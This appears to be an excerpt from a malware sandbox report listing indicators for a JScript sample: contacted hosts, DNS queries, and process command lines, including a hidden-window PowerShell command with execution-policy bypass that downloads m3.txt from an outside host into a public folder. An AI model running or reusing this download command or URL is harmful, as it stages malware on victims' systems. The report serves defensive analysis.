Technical Information
- https://app.nihaoconsult.com/seafhttp/files/6a16cd76-b91d-4710-97b2-b37b7573da9e/m3.txt as c:\users\public\libraries\m3.txt
- 'ap#.###aoconsult.com':443
- 'x.##2.us':80
- 'microsoft.com':80
- http://x.##2.us/x.cer
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- 'ap#.###aoconsult.com':443
- DNS ASK ap#.###aoconsult.com
- DNS ASK x.##2.us
- DNS ASK microsoft.com
- '%WINDIR%\syswow64\cscript.exe' /e:jscript "<PATH_SAMPLE>.js"' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass (New-Object System.Net.WebClient).DownloadFile('https://app.nihaoconsult.com/seafhttp/files/6a16cd76-b91d-4710-97b2-b37b7573da9e/m3.txt', 'C:\Users\Public\Librarie...' (with hidden window)
- '%WINDIR%\syswow64\cscript.exe' /e:jscript "<PATH_SAMPLE>.js"